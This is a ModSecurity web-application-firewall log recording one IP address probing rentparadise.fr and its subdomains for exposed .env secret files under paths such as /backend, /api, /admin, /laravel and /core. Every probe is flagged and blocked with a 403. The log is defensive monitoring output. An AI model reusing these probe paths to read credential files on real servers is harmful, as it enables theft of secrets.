[Mon May 11 13:32:12.336076 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-POSQ-m-m0ukSShtdiwAAAUs"]
[Mon May 11 13:32:12.336288 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-POSQ-m-m0ukSShtdiwAAAUs"]
[Mon May 11 13:32:12.336478 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdiwAAAUs"]
[Mon May 11 13:32:12.344377 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vVgAAAMg"]
[Mon May 11 13:32:12.344605 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vVgAAAMg"]
[Mon May 11 13:32:12.345355 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vVgAAAMg"]
[Mon May 11 13:32:12.351088 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0WwAAAAA"]
[Mon May 11 13:32:12.351339 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0WwAAAAA"]
[Mon May 11 13:32:12.351543 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0WwAAAAA"]
[Mon May 11 13:32:12.353520 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-POJEyNRN152ArORllQAAAEM"]
[Mon May 11 13:32:12.353690 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-POJEyNRN152ArORllQAAAEM"]
[Mon May 11 13:32:12.353877 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORllQAAAEM"]
[Mon May 11 13:32:12.367461 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vVwAAAMg"]
[Mon May 11 13:32:12.367680 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vVwAAAMg"]
[Mon May 11 13:32:12.367973 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vVwAAAMg"]
[Mon May 11 13:32:12.382386 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-POSQ-m-m0ukSShtdjgAAAUs"]
[Mon May 11 13:32:12.382600 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-POSQ-m-m0ukSShtdjgAAAUs"]
[Mon May 11 13:32:12.382793 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdjgAAAUs"]
[Mon May 11 13:32:12.399077 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-POJEyNRN152ArORlmAAAAEM"]
[Mon May 11 13:32:12.399289 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0XwAAAAA"]
[Mon May 11 13:32:12.399300 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-POJEyNRN152ArORlmAAAAEM"]
[Mon May 11 13:32:12.399474 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0XwAAAAA"]
[Mon May 11 13:32:12.399494 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlmAAAAEM"]
[Mon May 11 13:32:12.399666 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0XwAAAAA"]
[Mon May 11 13:32:12.416689 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vWwAAAMg"]
[Mon May 11 13:32:12.416917 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vWwAAAMg"]
[Mon May 11 13:32:12.417126 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vWwAAAMg"]
[Mon May 11 13:32:12.432421 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-POSQ-m-m0ukSShtdkgAAAUs"]
[Mon May 11 13:32:12.432625 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-POSQ-m-m0ukSShtdkgAAAUs"]
[Mon May 11 13:32:12.432811 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdkgAAAUs"]
[Mon May 11 13:32:12.445829 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-POJEyNRN152ArORlnAAAAEM"]
[Mon May 11 13:32:12.446079 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-POJEyNRN152ArORlnAAAAEM"]
[Mon May 11 13:32:12.446324 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlnAAAAEM"]
[Mon May 11 13:32:12.447490 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0YwAAAAA"]
[Mon May 11 13:32:12.447712 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0YwAAAAA"]
[Mon May 11 13:32:12.447895 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0YwAAAAA"]
[Mon May 11 13:32:12.454801 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-POSQ-m-m0ukSShtdlAAAAUs"]
[Mon May 11 13:32:12.455023 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-POSQ-m-m0ukSShtdlAAAAUs"]
[Mon May 11 13:32:12.455230 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdlAAAAUs"]
